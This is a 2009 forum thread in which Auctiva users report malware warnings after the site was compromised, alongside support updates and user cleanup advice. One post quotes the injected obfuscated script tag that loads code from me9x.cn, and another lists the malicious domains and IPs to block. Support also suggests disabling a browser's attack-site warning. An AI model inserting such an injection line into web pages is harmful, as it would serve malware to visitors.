attention! urgent! virus on auctiva.com; Trojan-Clicker.HTML.IFrame.kr

Yea my AntiVir is saying Malware detected.

Whats up Auctiva


**couple hours later (11:16 AM)**
now it says Virus, and nothing about Malware. I have no idea whats going on.

I'm not an expert, but those URLs do not look like Auctiva ones...they end in .js? All of Auctiva's URLs end in .aspx. If there was really a virus on the auctiva site (which I would think is highly unlikely), I'm sure there would be 1,000s of people on here complaining about it.

Thats what I thought looking at his links but my AntiVir does say Malware ALERT and advises not to continue in Internet Explorer.

On Google Chrome its the same thing ONLY the Google Chrome browser finds it and warns me.

I get warnings when I

when I logged in
save a listing
put a picture on a listing
change the folder to a different picture folder
click the picture in a listing preview
Click edit to edit picture
to crop a picture
the save after the crop
choose a category

and bunch of other times, I just choose not to bore you anymore

A message from Google Chrome when i try to make a listing.

"Warning: Visiting this site may harm your computer!
The website at www.auctiva.com contains elements from the site me9x.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for me9x.cn.
Learn more about how to protect yourself from harmful software online."

It's a bunch of chinese sites links on the site. you can even see a tiny square just on top of the auctiva in some pages. Looks to me security has been compromised and someone embedding scripts into the site. It's rather irritating with my browser crashing a few times because of it.

I was just going to post something about the Pulsing "A" in the upper left! But you beat me to it.

Hmmmm...

I'm getting an odd notice to load an ActiveX Control from the main page ( snapview.ocx ). That one does have malware possibilities. It's not on every visit (I'm declining until I understand the situation), so it may not be on all the servers.

The .js lib is their javascripts.

Has anyone reported the problem?

Danno

Hi all, just read your messages and also experincing same problem. attempt to gain access into listings when the page crash followed by a warning that my anti virus has detected a virus....ca anyone advise please?

quote:

Originally posted by Danno:
Has anyone reported the problem?

I haven't, not sure how though!

Experiencing many of the same problems. One problem I have encountered, which I haven't seen anyone one else describe, is when opening the listings page. Windows installer tries to install something related to "Microsoft Office 2000 SR-1 Professional."

avg is also showing alert on this:
http://safeweb.norton.com/repo...ow?name=luckffxi.com

It's not appearing on all the pages, only on e.g. saved listings page

Now everywhere I go in the site I am getting warning from AntiVir.

I have 2 pulsing "A"s by the auctiva logo now!

I have to log off and scan my computer now! I'll check back later

Wanted to sign up for Auctiva for our new Ebay store when, lo and behold, Chrome pops up a security warning. I dug into this and found some very interesting stuff.

It looks like Auctiva has a security hole someone is actively driving their truck through it. The problem is in http://www.auctiva.com/js/windows.js
If you point your browser there (it's safe, it will read as text) and scroll down the bottom you should see a document.write statement. If you don't see it wait a few minutes and refresh. It looks like someone is trying to fix the file but something else is putting the attack back in which is why it might not be there when you look.

See how the URL looks like gibberish? It's ASCII code for me9x.cn, a Chinese site blacklisted by Google. The code in question writes a GIF file into the page. This is why you're getting it blocked in browsers like Firefox or Chrome, which pull the Google blacklist and enforce it. If your antivirus picked it up, good for you. The GIF file is likely reading your cookies (or worse if you're using IE). Whatever the case, that file is up to no good and if you can see this image Gortusk describes you may already have problems on your computer that you can't see.

I would highly suggest the following
1. Do not log into auctiva.com for now. The forums are clean (they appear to be on a different server) but the main site is clearly compromised.
2. Switch to Firefox or Google Chrome as your browser. Both browsers blocked the attack.
3. Run some anti-malware software, especially if your antivirus didn't catch this attack (not all antivirus has anti-malware). A good place to start is Adaware (http://www.lavasoftusa.com). There are many others out there as well (AVG seems to be catching this already).

Here's hoping for a quick fix. Was hoping to add some tools to my store today.

ooh..
document.write('<script src=http://%6D%65%39%78%2E%63%6E/new.gif></script>');

chinese bad boy ruining our day(or night)..

I agree with Highland. One of my two computers appears to have been compromised.

Danno

I NEVER get viruses, yet as of this a.m I've spent my entire day trying to figure out why I had one when I booted up this a.m. (Auctiva was the last site visited yesterday). I have a big red warning from Norton (this pop-up window won't go away!) it says:

HIGH RISK

trojan.malscript!html

So now I can't work - now what? Is every Auctiva user infected? HOW did this happen?

Hi all,

I have AVG 7.5 internet security and every time I try and do something in auctiva it throws me out. Can't even email auctiva to notify them!!

Anyone had a response from them regarding how long it's going to be before we can use auctiva gain?

quote:

Originally posted by womandi:
I NEVER get viruses, yet as of this a.m I've spent my entire day trying to figure out why I had one when I booted up this a.m. (Auctiva was the last site visited yesterday). I have a big red warning from Norton (this pop-up window won't go away!) it says:

HIGH RISK

trojan.malscript!html

So now I can't work - now what? Is every Auctiva user infected? HOW did this happen?

calm down, I'm pretty sure a lot others have been infected also. I'm using maxthon which tags on to IE's engine. I still can login, get a bunch of alerts and Auctiva is still functioning as it is.

What I suggest, is if you need to do something urgent, just get infected like me and finish up what need to be done on auctiva, close your browser clear your cache and temp files, run a full antivirus AND antispyware scan(spybot, windows defender,etc) and clean up the system.

If not, check for update here until an admin pops up telling us the problem have been fix. I'm sure the support team is fully aware of the situation and working on it asap.

Hi Community,

Thanks for helping to bring this issue to our attention. We are receiving reports of this nature from several customers and our engineering team is currently looking into why these warnings have started coming up. I'm not sure what is causing this at the moment, but I'll post again to this thread as soon as additional information becomes available.

-Mike

Hi Community,

Update - I will actually be updating the following thread in the "News" section of our community forum when additional information on this topic becomes available: https://community.auctiva.com/e...&r=25410931#25410931. Please check there for updates on this issue.

-Mike

Yeah there is a small little A at the top of the page that links to a chineese site. My pc is all bogged down since login into auctiva.

Google Chrome (and FireFox) are warning you about the problem before you enter, but you can still catch the virus useing them. SO until someone from Auctiva says its safe to go on the main site I will be checking here.

anyone know if we need to be worried about our auctiva commerce stores?

I am also getting this virus threat message. I note that Auctiva are aware of that problem and trying to fix it.
I also listed 5 new items yesterday afternoon but although they said they were being posted, none of them made it through to EBay. They are sitting in my saved listings. I tried to post one of them again and got the same response.
Has anyone else had this problem or know whether it is associated with the virus threat?
Susan

I am on a MAC using Firefox. Site is very very slow! It is taking a long time to load Auctiva and each page I want to visit takes a long time to load too.

Therein lies one of the biggest reasons I rarely use IE.

I used it a few weeks ago on an older computer that has a regularly updated Symantec AV program and it still has a Trojan which Symantec kindly isolates daily.

Here are the updates for the virus problem and speed issues.
https://community.auctiva.com/e...081020411/m/25410931

Same here - viruses getting detected EN MASS when I use Internet Explorer. Mozilla Firefox is OK, however, it only gives me the "newer version" option of uploading pictures, and then my computer locks up.

O NO! I have it Now(

I haven't being infected... maybe because I haven't log in my auctiva account. I have only visited the forums several times today.



http://thetimewatch.auctivacommerce.com/

Ditto. McAfee says there's a virus in my c/windows/gameeeeee file. McAfee warns me of this location every page on Auctiva - both my firefox and explorer. Told HELP but was told it was my settings. When I say to McAfee to delete the virus it pops up again on the next page I open in Auctiva. Rebooting doesn't matter. The one listing I made to eBay today showed up there totally cockeyed. Took me 35 minutes to straighten it out on ebay. This is devestating.

I am on a MAC. I am getting the google warning whenever I try to log onto Auctiva today. Even when I tried accessing this group, Google was blocking it! I switched to AOL and got through to post this.
A few of my customers paid last night and this morning. Multiple auctions that were combined and paid are now showing as uncombined and not marked paid on eBay.
Everyone should check Paypal for what is paid since last night.

All browsers are sending up a warning. The problem is far from fixed.

Do you mean this trouble has extended to eBay as well???

I cna't even get in with Firefox today. I had to switch to IE but when I ask why it is blocked in Firefox, it reports their tests all come up negative on virus but the site has been reported as harboring malware or virus. THIS NEEDS TO BE FIXED NOW!!!!!!!!!!!!

When a customer clicks on a picture link it will take them to the page that states it is a reported attack site. Big red box, very intimidating like I am trying to attack their computer myself.

Thanks Auctiva for scaring away any of the few customers left on eBay.

Having the site down and slow is one thing since it is free but actually having this problem is just ridiculous and beyond any normal decency. You are directly affecting my ability to make a living. But hey it's free right?

Ok, so now whenever anyone is clicking on my pics in the auction... they get this "Warning" message. Real good for business here.

Looking at the Update Link... there are no updates since yesterday? What's going on??

UPDATE? HELLO, ANYONE HOME?

Still getting this on Firefox:

Reported Attack Site!

This web site at www.auctiva.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

Here is exactly what GOOGLE is reporting at about noon MST:

What is the current listing status for auctiva.com?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 45 pages we tested on the site over the past 90 days, 5 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-02-21, and the last time suspicious content was found on this site was on 2009-02-21.

Malicious software includes 6 scripting exploit(s), 6 trojan(s). Successful infection resulted in an average of 10 new processes on the target machine.

Malicious software is hosted on 2 domain(s), including luckffxi.com/, auctlva.com/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including me9x.cn/.

This site was hosted on 3 network(s) including AS16509 (AMAZON), AS174 (COGENT), AS14744 (INTERNAP).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, auctiva.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

A FIX NOW WOULD CERTAINLY BE NOT ONLY HELPFUL BUT APPROPRIATE!!!

I'd like to add that firefox and IE are now also blocking auctiva or reporting it as an attack site

The bigger issue here, is that some of us that are on the bad servers, have auctions going. While these auctions and their pictures are still viewable. Having a customer click to enlarge a picture, and getting A TROJAN ATTACK notice, makes for NON-Sales. I would rather you pull all the servers, then leave them up with the problem. At least my customers will more than likely come back, instead of thinking I'm a hacker.

MY thought exactly... I have already been contacted by 6 different potential buyers in regards to this. How long before they complain to Ebay and they pull listings?

And yet.. still no update since 6:44 PM yesterday??

mmmm..something odd going on here. When I visit the Auctiva home page I no longer get the AVG virus warning and I am logged out yet I don't remember doing so.

Also, there is a flashing ALERT message button at the top of the page. When I mouse over it there are no details appearing in the taskbar at the bottom of my screen but details appear when I mouse over all other buttons.

Is this an genuine alert from Auctiva? I'm afraid to click on it!

If you are on a problem server you get a page load error right now. There has not been a single fully operational weekend since two weeks before Christmas.

So it is now Saturday afternoon EST... what's the latest Tech Support?

[QUOTE]Originally posted by morcovelo:
When a customer clicks on a picture link it will take them to the page that states it is a reported attack site. Big red box, very intimidating like I am trying to attack their computer myself.

So, any listings that I have done since last night are infected?

I am not receiving any messages at all when I click on pictures from auctions that were listed last night or today.
I don't think that is happening to everyone.

I don't know about any listing posted yesterday, but I can tell you that it is affecting ALL 250 of my listings active on ebay right now with the pics being hosted by Auctiva. People are emailing me and such... I am just waiting for it to get back to Ebay and then they pull my listings!

And yet... still no update!! Is anyone from Auctiva there?

There is a new annoncement saying the problem is fixed ... it is not. I still get the warning in FireFox but not in IE.

It is not the pictures that are infected it is when the viewer goes to the auctiva site hosting the pics. That is when they can get the warning.

Google is still giving the Reported Attack Site! warning/block. I have removed cache and figured that was why I still got the warning but it is still not allowing me to open the auctiva site. I think they have to clear this up with Google!

The announcement reads ...

"I just heard from our IT team and am pleased to report that users should not longer receive warnings from their antivirus software while on the Auctiva website."

I still get the warning so this is not true. Tried clearing cache etc. but still the same problem.

And I thought eBay had glitches.

When I go to ebay and one of my auctions, if I click on the link on the moving gallery that says "Click here to browse all my ebay items" I get the Site attack message. This is because it is taking you to the Auctiva ebay listing store. The regular pictures of my auctions are not affected.
If this is fixed now, Auctiva has to clear this with Google!

Yea I had posted the news allert link up on twitter and got an email fomr them

Uh oh! We found a bad apple in your Twitter feed.

We detected a link in your account pointing to a phishing site or other harmful material that we identified as malware. Here's the troublesome post:

"Antivirus Warnings on Auctiva Website (2/20/09) [ your unsafe link was here ]"
February 20, 2009 20:48

We removed this update from Twitter. Please be mindful of others in the Twitter community, and post only safe links on Twitter.com.

Thanks! Twitter Support

quote:

Originally posted by Sabatur Pro Audio:
I don't know about any listing posted yesterday, but I can tell you that it is affecting ALL 250 of my listings active on ebay right now with the pics being hosted by Auctiva. People are emailing me and such... I am just waiting for it to get back to Ebay and then they pull my listings!

And yet... still no update!! Is anyone from Auctiva there?

I just deleted all of the listings that were done from last night to today. And I think it was right up there with your amount. I didn't list them yet. So, clean up isn't bad. Just a bunch of time wasted. I am sure auctiva is not at fault - just super frustrating!

I hope this is fixed.. I mean will ebay start pulling all of our listings?

I do not get the error on Camino, but Safari and Firefox both give me the Red Screen of Fear.

At least I've been able to work around this using Camino. No errors through Ebay there, either.

However, it sickens me that potential bidders are being scared away from my listings.

Mike said this was fixed - but not so.

Hi everyone - just logged on after abandoning Auctiva lately - fed up with messages about viruses everytime I logged on - to see that the problem has been fixed & closed. Not so sure Auctiva - just got the following from AVG - WARNING (TROJAN) & INFECTION re EXPLOIT.FLASH 21/02/09 21:43
Thankfully they are in my virus vault.

Also checked some photos on a listing to find the following that I didn't put in there:
countercredit.gif & deadflashcounter.jpg

Suggest people check their image downloads on auctiva hosting and delete asap.

Hope this is useful.

Firefox keeps displaying an ATTACK SITE WARNING every time you go to Auctiva or change the page there. On ebay if you try to supersize a picture the attack site page comes up. If you turn off the display warning box in the Firefox security section it stops.

Yes.. IE seems to be working now. But Firefox is still an issue no matter what they are saying

A few of our auctiva.com web servers have been pulled out to do some emergency repairs. This means we are running on fewer servers than normal and the site will be running slower than normal. Friday 7:30pm update: We are faster than earlier today, but are continuing to rotate servers in and out and are still not at full capacity. Planning to be back to full capacity Saturday afternoon.

Riiiiiiiiiiiiiight.

Still waiting to hear from a legal speaking agent for Auctiva regarding whether or not our personal information has been compromised.


Vendio, here I come!!

I would consider Vendio but looking at their pricing, I think my total fees for ebay would more than double. It is hard enough making any money on ebay without doubling my direct expenses.

I agree.. Ebay's fees are bad enough without adding more expenses and less profit.

Obviously, I am a little upset right now because of what's going on but I have to say, I will still stick Auctiva (unless another great item comes along). I have been using them for over a year now and this is the FIRST real issue I have seen. Although to me, this is big!

I guess I would just feel a lot better (and more secure) if SOMEONE from Auctiva would just keep us posted. This is what is making me lose confidence. The idea that these posts have been going on all day and not one respnse. A little pathetic actually.

They HAVE been posting updates in this thread

Posted February 21, 2009 03:05 PM
Hi Community,

Update - If you are using the Firefox browser and are unable to use your account because you are receiving a warning stating the Auctiva is an "attack site", you should be able to workaround it by selecting "Options" from the "Tools" menu and disabling the "tell me if the site I’m visiting is a suspected attack site" setting under the "Security" tab.

We have removed what was causing that warning to be displayed from our systems but that warning is still showing up because we need to be rescanned by Google, which we are going to do as soon as we finish up the work we're doing.

If you have any questions, please feel free to contact our customer support team using the web form on the following page of our site: http://www.auctiva.com/help/requesthelp.aspx. I'll post further updates to this thread as additional information becomes available.

-Mike

And here I was checking the original thread they started... don't know what I was thinking! Didn't think they atsrted another thread....

my sister is a mere 5 miles away from me & still gets the warnings.
she uses firefox like i do but when changing the security as i did she still can't access AUCTIVA
the change in securtiy settings DID help me

she is on a mac i'm not

is there anything she can do to get on

she is going nutz & won't stop harassing me with annoying help me phone calls!

so pleeeeeeeez help us both!!! LMAO

quote:

Originally posted by Sabatur Pro Audio:
Yes.. IE seems to be working now. But Firefox is still an issue no matter what they are saying

Yea, I am able to use IE, but not Firefox. I did a scan and found a TROJAN. I really am at a loss at what to do. I am not a techie. So, I don't know how this virus and the Mcafee works. After the scan, I didn't see anything stating it was gone or for me to delete it. It is on the old 'kids' computer. If anyone knows if Mcafee automatically removed it, please let me know.

quote:

my sister is a mere 5 miles away from me & still gets the warnings.
she uses firefox like i do but when changing the security as i did she still can't access AUCTIVA
the change in securtiy settings DID help me

she is on a mac i'm not

is there anything she can do to get on

she is going nutz & won't stop harassing me with annoying help me phone calls!

so pleeeeeeeez help us both!!! LMAO

I am on a MAC too. Tell her to use Safari and to click the ignore warning button when the page loads. She will get the auctive start page to log in.

Oops...I take that back. I can't log in either. I keep hitting the ignore warning button and it keeps looping back.
Tech support help!

Mcaffee should automatically take care of it if it was found by Mcaffee. You might try scanning again!

Nowhere near fixed. Google keeps scanning and showing more and more infections on their test. The virus remains active and we get nothing from Auctiva for hours on end.

quote:

Originally posted by iceman:
Nowhere near fixed. Google keeps scanning and showing more and more infections on their test. The virus remains active and we get nothing from Auctiva for hours on end.

Ok, apparently virus free. I will scan again when I log off.

I am scanning my system using Norton evertime I log off but the information that I posted was what google is showing for the auctiva site and 2 out of the 3 servers it is using to cause the Firefox warning messages. Google is doing it at their end, not mine.

Ok.. this is a little ridiculous. So now checking the NEW thread they started, I see no update. Have they started yet another to let us know?

And the answer is to turn off the security check? So then I am vulnerable for other sites?

So yesterday i said that I would stay with Auctiva... today I am re-thinking this.

The problem is that buyers get that message when they click on an image in your eBay listing if they are using Firefox. And a lot of people use Firefox.

Yes, I will just tell my customers to turn off their security... they will be fine with that

Hi Folks,

If you are getting repeated warnings from your Antivirus and/or system messages, like "Data Exception Protection", it's probable that your system is infected with a Trojan that's persistent and keeps attempting to infect from that China site. From Google's analysis, it's apparent that there are muliple possible trojans and downloaded viruses involved. Some may be very diffcult or nearly impossible to clean 100%. After recognizing that possibility, here's what I did with one XP system that did get infected and needed a restore.

1. I removed/unplugged the system from the network, i.e. the persistent route of infection is from the China site. That at least breaks the connection for added infection and/or theft of personal info.

2. I rebooted the system to Safe Mode (press and hold F8 key during boot for menu).

3. I used System Restore to restore to a point prior to the infection, as follows:

3a. From Desktop, select Start -> All Programs -> Accessories -> System Tools -> System Restore

3b. From the Welcome to System Restore window, select "Restore my computer to an earler time" (default) and "Next>" button.

3c. From the Select a Restore Point window, you'll see a Calendar where the bolded dates indicate the system has available restore points. Select an available date prior to the probable infection. February 18th or earlier should be Safe, given the reports started on the 20th. Select "Next>" button and continue.

3d. The restore should commence with a final reboot when complete.

4. On reboot, goto System Properties, Remote Tab, and unSelect "Remote Assistance" and "Remote Desktop" features (precautions).

4a. (UPDATE: added 2/24) Follow steps posted on this thread by Auctiva Mike to clear your browser cache. Note, I did do this step and forgot to add it to my original post. Thanks to the person who started this thread for the warning on route of infection.

https://community.auctiva.com/e...?r=92410481#92410481

5. Run checks including Microsoft's Malicious Software Removal Tool to verify or their One Care Safety Scanner. Reconnect to the net to get the tools.

http://www.microsoft.com/secur...eremove/default.mspx

Any new programs or updates installed post the recovery will require reinstall.

Any data, eMail, etc. should be retained post restore without a problem.

Hope this helps those with badly infected XP or Vista systems.

(UPDATE: added 2/24) Please follow advise posted my Mike and Kevin at Auctiva. I'm offering this procedure as another alternative, not an officially sanctioned method by Auctiva.

Danno

Thanks DAnno. I would do all that but for some strange reason the calendar in my system restore will only let me choose Feb 20/21/22 (those are the only bold dates) and that's when this whole virus started. So now what to do? I can't even restore.

My Norton has been showing Virus alerts for 3 days. One medium risk = atlsystem _____ (with numbers after it) "is attempting to connect to a DNS server". One HIGH RISK = Virus Name "Downloader" (the past two days the high risk virus name was "trojanmalscript!html" Apparently NOrton can't get rid of it (unable to repair this file). I even went to malbytes? - something like that, the other day and scanned it it can't get rid of it either.

This thing is really huge, huh? I have no idea. I'm lost here! I just know I gotta work or there's no money for bills.

Hi womandi,

That does sound ugly.

Check January for any bold dates (use the back-arrow key on the calendar). If you run normal Windows Update installs, you should have gotten a February update around the 11th??? However, I'm hoping you at least have the January update.

Danno

18 hours and not a word from Auctiva on an update. Thanks a bunch. I have about 100 auctions ending tonight using Auctiva checkout. This is going to be real hard to explain to buyers and it is just ridiculous.

Hello ANYBODY OUT THERE AUCTIVA?

It's hit the press.

http://blog.auctionbytes.com/c...09/2/1235318918.html

Maybe they have thrown in the towel? It is very strange not to hear from them.

And Jeff is telling everybody there the exact opposite of what we get here. We are to disable are warning systems in our browser, according to them, and he is tell everybody in the press to make sure thery are up to date and turned on. HELLO!!!

As an aside, I am sure tonight that telling buyers to turn off their virus warnings and and forward me money through their Paypal account is going to work just fine. YEA RIGHT!

There is a new message from Mike at Auctiva support up at 9:09 stating they are aware of several issues causing site slowness and that they are working on them. DUH, THE PROBLEM ISN'T SLOWNESS!!! ITs the virus warning problems!

Getting real frustrating and more than a little PO'd

And while I am ranting, how about taking the CHECKOUT SYSYSTEM DOWN UNTIL THIS IS RESOLVED!!!

I would rather have to deal with ebay and Paypal invoices than folks thinking I am trying to steal their passwords and cash!

I just tried inkfrog but it is a real disaster compared to auctiva. This is a real nightmare all the way across the board. Is it safe to list with auctiva or is there actually a virus risk? I am going to lose an entire week here. I can find nothing to compare to auctiva and it's ease of use. any ideas?

Still waiting to hear from a legal speaking agent for Auctiva regarding whether or not our personal information has been compromised.

I have looked at both inkFrog and Vendio and have not come up with a viable alternative. InkFrog to small and cumbersome, Vendio to expensive but Auctiva's track record over the last 2 months has got me looking for the first time in about 4 years. I can't afford this every weekend and the support here has been slightly less than acceptable recently, relying on understatement ther to make the point.

I am going to list through auctiva for tonight. SCREW IT I can find no viable alternative. If it works I can make enough money to replace a damaged computer or buy a new windows copy. I am just plain sick. This is the best site I have ever found and now this. Are auctions posting?

No, you currently cannot, list, schedule or save auctions. For all intents and purposes Auctiva is down save this board and getting error messages on attmepts to do anything else.

I use firefox and the only problem I have is when supersizing a picture. Then the red page of death comes up. People are bidding like crazy on my current auctions. I do not use auctiva checkout. The templates and small pictures work just fine.

Hi,

If my posted steps help, please feel free to repost. I did the restore Friday and that system is still working fine today and rescans clean.

I wrote-down what I did from memory not thinking this might be a killer problem, so if anyone wants to add info, suggestions, or make corrections...please do.

I'm am staying off the Auctiva site until it gets a complete rescan by Google.

If you have a commercial Firewall product that can block specific addresses or URLs, a block list posted might help. Google suggests that

me9x.cn [121.14.137.36] and luckffxi.com [67.229.127.42]

are noted candidates to block.

Danno

Auctiva may have thought they fixed the virus alerts but I have gotten three e-mails today from customers getting the alert when trying to look at the posted photos in my auctions. This is turning into a nightmare.. Mike

Finally got a listing to save after hours of frustration. Maybe, just maybe, there is a glimmer of hope but I ain't holding my breath

Hi Folks,

I just got news from a Seller friend that attempting to use System Restore was blocked by the malware. In their case, they waited too long and the malware had corrupted the system to the point that they had to work with Norton over the phone to get the malware removed. Their Norton AV had been giving alerts for two days.

(Note: I shut my system down within minutes of detecting the infection and got it off the net before it got to that condition.)

Norton told them they are "swamped" with cases, and it sounds like it may be more than just Auctiva under attack.

Danno

Edit: It looks like Google rescanned the site in the last hour. Their Safe Browsing page shows this update.

Of the 49 pages we tested on the site over the past 90 days, 5 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-02-22, and the last time suspicious content was found on this site was on 2009-02-21.

I have been able to list right along. Listed 5 aucitons last night and several this morning. I normally use firefox, but used IE to list yesterday and today.

I do admit to being paranoid aobut it. I ran my virus scan twice yesterday, before and after listing on aucitva. And I ran Microsoft Malicious Software Removal tool today. No issues were found on my computer by McAfee or Microsoft. And a check of McAfee shows that their scan of the Aucitva site today found it free of viruses, malware and spyware.

Google may have rescanned but when I go to Auctiva using Firefox, I still get the "RED DEATH" warning.